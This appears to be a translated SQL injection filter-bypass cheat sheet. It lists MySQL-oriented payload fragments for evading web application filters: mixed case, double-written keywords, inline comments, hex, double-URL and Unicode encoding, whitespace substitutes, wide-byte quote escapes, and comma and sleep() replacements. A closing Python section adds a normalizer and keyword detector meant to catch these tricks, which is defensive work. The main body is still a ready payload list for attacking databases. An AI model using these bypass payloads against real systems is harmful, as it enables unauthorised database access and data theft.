Reference links:
https://blog.csdn.net/huanghelouzi/article/details/82995313
https://www.cnblogs.com/vincy99/p/9642882.html
Table of contents:
- Case bypass
- Double-writing bypass
- Inline comment bypass
- Encoding bypass
- <> bypass
- Comment symbol bypass
- Space bypass
- or / and bypass
- Equal sign (=) bypass
- Single quote bypass
- Comma bypass
- Filtered function bypass
0x01 Case bypass
UniOn SeleCt
0x02 Double-writing bypass
ununionion seselectlect
0x03 Inline comment bypass
MySQL inline comments: statements placed inside /*!...*/ are treated as comments and ignored by other databases, but MySQL executes them.
and /*!select*/ 1,2
0x04 Encoding bypass
Hex bypass (0x7465737431 is the hex encoding of the string test1):
select * from users where username = 'test1';
select * from users where username = 0x7465737431;
Double URL-encode the entire keyword:
1+and+1=2 becomes 1+%25%36%31%25%36%65%25%36%34+1=2
Unicode encoding to bypass filtering of some symbols:
Single quote => %u0037 %u02b9
Space => %u0020 %uff00
Left parenthesis => %u0028 %uff08
Right parenthesis => %u0029 %uff09
0x05 <> bypass
Some sites filter by stripping the "<>" characters, so after the filter the keyword is rejoined:
unio<>n sel<>ect
0x06 Comment symbol bypass
uni/**/on sel/**/ect
0x07 Space bypass
/**/
%20 %09
()
Newline (URL-encoded as %0A)
` (the backtick key, above Tab)
Tab
Two spaces
0x08 or / and bypass
and = &&
or = ||
0x09 Equal sign (=) bypass
like: without wildcards it behaves exactly like =, so it can be used as a replacement;
rlike: same usage as like; without wildcards it also behaves like =;
regexp: MySQL's REGEXP operator performs regular expression matching;
<> is equivalent to !=, so prefixing it with ! gives the result of =.
?id=1 or 1 like 1
?id=1 or 1 rlike 1
?id=1 or 1 regexp 1
?id=1 or !(1 <> 1), or alternatively 1 !(<>) 1
0x10 Single quote bypass
Wide-byte injection
# when single quotes are filtered: %bf%27 %df%27 %aa%27
Hexadecimal (0x7573657273 is the hex encoding of the string users)
'users' => 0x7573657273
0x11 Comma bypass
In blind injection use "from n1 for n2", where n1 is the start position of the substring and n2 the number of characters to read:
select substr("string",1,3); is equivalent to select substr("string" from 1 for 3);
Use the join keyword:
union select 1,2,3 is equivalent to union select * from (select 1)a join (select 2)b join (select 3)c
Use the offset keyword (applies when the comma in limit is filtered):
limit 2,1 is equivalent to limit 1 offset 2
0x12 Filtered function bypass
sleep() --> benchmark()
and sleep(1) is equivalent to and benchmark(1000000000,1)
group_concat() --> concat_ws()
select group_concat("str1","str2"); is equivalent to select concat_ws(",","str1","str2");
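As an added defensive example (not from the original post), here is a Python normalizer that undoes the encoding, comment, <> and whitespace tricks listed in the sections above before keyword matching, next to the single-pass keyword-removal filter that double-writing defeats; the keyword list, the decoding-round cap and the suspicion rule are my assumptions.

```python
import re
from urllib.parse import unquote

# Keyword vocabulary for detection (assumed here; extend per application)
KEYWORDS = ("union", "select", "sleep", "benchmark", "group_concat",
            "concat_ws", "substr", "limit", "offset", "rlike", "regexp")

def _decode_percent_u(s: str) -> str:
    """Decode IIS-style %uXXXX escapes and fold fullwidth ASCII (U+FF01..U+FF5E) to ASCII."""
    def repl(m):
        cp = int(m.group(1), 16)
        if 0xFF01 <= cp <= 0xFF5E:
            cp = cp - 0xFF01 + 0x21
        elif cp == 0xFF00:          # listed in the post as a space variant
            cp = 0x20
        return chr(cp)
    return re.sub(r"%u([0-9a-fA-F]{4})", repl, s)

def normalize(value: str, max_rounds: int = 3) -> str:
    """Undo the encoding and comment layers from the post before keyword matching."""
    s = value
    for _ in range(max_rounds):     # bounded loop: double URL-encoding needs two passes
        decoded = _decode_percent_u(unquote(s.replace("+", " ")))
        if decoded == s:
            break
        s = decoded
    s = re.sub(r"/\*!\d*(.*?)\*/", r" \1 ", s, flags=re.S)  # MySQL executes the body of /*!...*/
    s = re.sub(r"/\*.*?\*/", "", s, flags=re.S)             # /**/ used to split a keyword
    s = s.replace("<>", "")                                 # a filter that strips <> sees the rejoined keyword
    s = re.sub(r"[\s`]+", " ", s)                           # tab, newline, backtick, double spaces
    return s.lower()

def weak_filter(value: str) -> str:
    """Single-pass keyword removal: the filter style that double-writing defeats (for contrast)."""
    out = value.lower()
    for kw in ("union", "select"):
        out = out.replace(kw, "")   # no rescan after removal, so 'ununionion' collapses to 'union'
    return out

def found_keywords(value: str) -> set:
    """SQL keywords present after normalization."""
    s = normalize(value)
    return {kw for kw in KEYWORDS if kw in s}

def is_suspicious(value: str) -> bool:
    """Flag union/select pairs and timing functions; tune the rule per application."""
    kws = found_keywords(value)
    return {"union", "select"} <= kws or bool(kws & {"sleep", "benchmark"})
```

Matching is done on the normalized string, never by deleting keywords, which is why the double-written input is still caught while weak_filter lets it through.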